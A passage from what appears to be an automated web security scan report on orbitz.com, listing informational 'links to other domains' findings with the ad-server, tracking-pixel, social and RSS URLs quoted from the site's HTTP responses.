           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=hideMeta&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663109418&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=hideMeta&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663109418&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=hideMeta&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663109418&dsrc=7&" height="55" width="120" border="0"></a></noscript> <a class="eaEnabled" rel="nofollow" href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101&popupsDisabled=true" target="_blank" onClick="return popUpGen('http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101&popupsDisabled=true');" > <img src="/site/img/logos/truste.gif" width="128" height="35" border="0" alt="TRUSTe" />
...[SNIP]...

17.358. http://www.orbitz.com/App/SubmitQuickSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/SubmitQuickSearch

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/SubmitQuickSearch?z=2ebe&r=h

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=A473AE481AF0148C16EBAD58BC4AA48A; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:11:52 GMT
Content-Length: 156615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=225&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=225&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=225&width=519&adType=noframe&" height="225" width="519" border="0"></a>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<div class="adColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="adColumn lastColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&" height="280" width="336" border="0"></a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296663113486&dsrc=7&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

17.359. http://www.orbitz.com/App/ViewRSSHelpPage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRSSHelpPage

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/ViewRSSHelpPage?source=ft&type=l

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://my.yahoo.com/
http://sage.mozdev.org/
http://twitter.com/orbitz
http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif
http://us.rd.yahoo.com/my/atm/Orbitz.com/Airport%20delay%20updates/*http:/add.my.yahoo.com/rss?url=http://updates.orbitz.com/rss/flying_forecast.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Atlanta/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/GA/Atlanta.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Atlanta/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/ATL.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Atlanta/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/ATL.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Atlanta/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/ATL.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Baltimore/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/BWI.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Baltimore/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/BWI.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Boston/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/MA/Boston.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Boston/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/BOS.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Boston/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/BOS.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Boston/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/BOS.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Cancun/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/MX/Cancun.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Cancun/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/CUN.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Charlotte/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/CLT.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Charlotte/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/CLT.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Chicago/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/IL/Chicago.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Chicago/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/CHI.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Chicago/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/MDW.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Columbus/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/CMH.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Columbus/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/CMH.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Cruise%20Vacations/*http:/add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/cruises.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Dallas/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/DAL.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Denver/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/CO/Denver.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Denver/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/DEN.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Denver/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/DEN.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Denver/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/DEN.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Detroit/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/DTT.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Flights:%20Airfares%20by%20Departure%20City/*http:/add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/flightdeals.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Flights:%20Airfares%20by%20Destination/*http:/add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/flightdealsByDestinations.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Flights:%20Top%20deals/*http:/add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/topdeals-flights.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Fort%20Lauderdale/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/FLL.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Fort%20Lauderdale/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/FLL.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Honolulu%20(Island%20of%20Oahu)/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/HI/Honolulu(IslandofOahu).rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Honolulu%20(Island%20of%20Oahu)/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/HNL.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Hotels%20under%20$99/*http:/add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/HotelsUnder99.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Hotels:%20Exclusive%20Offers/*http:/add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/hotelpromos.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Hotels:%20Top%20Deals/*http:/add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/topdeals-hotels.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Houston/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/HOU.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Houston/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/HOU.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Indianapolis/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/IND.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Indianapolis/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/IND.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Kansas%20City/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/MKC.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Las%20Vegas/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/NV/LasVegas.rss.xml
